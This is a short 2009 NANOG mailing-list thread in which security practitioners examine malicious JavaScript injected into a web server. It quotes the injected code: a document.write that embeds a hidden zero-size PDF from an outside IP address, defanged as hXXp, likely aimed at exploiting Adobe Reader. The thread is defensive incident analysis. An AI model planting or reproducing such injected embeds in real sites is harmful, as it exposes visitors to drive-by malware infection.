Malicious code just found on web server
Chris Mills
securinate at gmail.com
Fri Apr 17 22:34:54 UTC 2009
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster at gmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster at gmail.com>
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
>> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>> document.write("<embed
>>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>>> type=\"application/pdf\"></embed>");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>> <embed src="include/two.pdf" width="1" height="0"
>>> style="border:none"></embed>
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>>
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -----END PGP SIGNATURE-----
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawgster(at)gmail.com
> ferg's tech blog: http://fergdawg.blogspot.com/
>
More information about the NANOG
mailing list